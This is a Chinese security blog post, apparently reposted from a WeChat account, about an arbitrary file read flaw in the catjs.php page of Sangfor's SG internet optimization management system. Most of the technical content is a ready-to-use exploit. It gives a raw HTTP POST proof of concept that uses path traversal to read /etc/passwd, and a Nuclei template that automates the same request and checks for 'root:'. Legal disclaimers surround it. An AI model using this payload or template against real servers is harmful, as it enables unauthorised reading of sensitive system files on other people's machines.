公众号新规只对常读和星标的公众号才能展示大图推送,建议大家把公众号“night安全”设为星标,否则可能就看不到啦!
免责声明
night安全致力于分享技术学习和工具掌握。然而请注意不得将此用于任何未经授权的非法行为,请您严格遵守国家信息安全法律法规。任何违反法律、法规的行为,均与本人无关。如有侵权烦请告知,我们会立即删除并致歉。谢谢!
漏洞概述
深信服 SG上网优化管理系统 catjs.php 存在任意文件读取漏洞,攻击者可利用该漏洞直接读取服务器敏感文件。
漏洞复现
POC:
POST /php/catjs.php HTTP/1.1Host: xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0Content-Length: 35Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded["../../../../../../../etc/passwd"]
NUCLEI POC
id: sangfor-sg-catjs-filereadinfo:name: 深信服SG上网优化管理系统catjs.php任意文件读取漏洞author: YGnightseverity: highdescription: descriptionreference:- https://tags: tagsrequests:- raw:- |-POST /php/catjs.php HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0Content-Length: 35Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded["../../../../../../../etc/passwd"]matchers-condition: andmatchers:- type: statusstatus:- 200- type: wordwords:- 'root:'
扫码关注
获得更多资讯
原文始发于微信公众号(night安全):【漏洞复现】深信服SG上网优化管理系统catjs.php任意文件读取漏洞 附POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论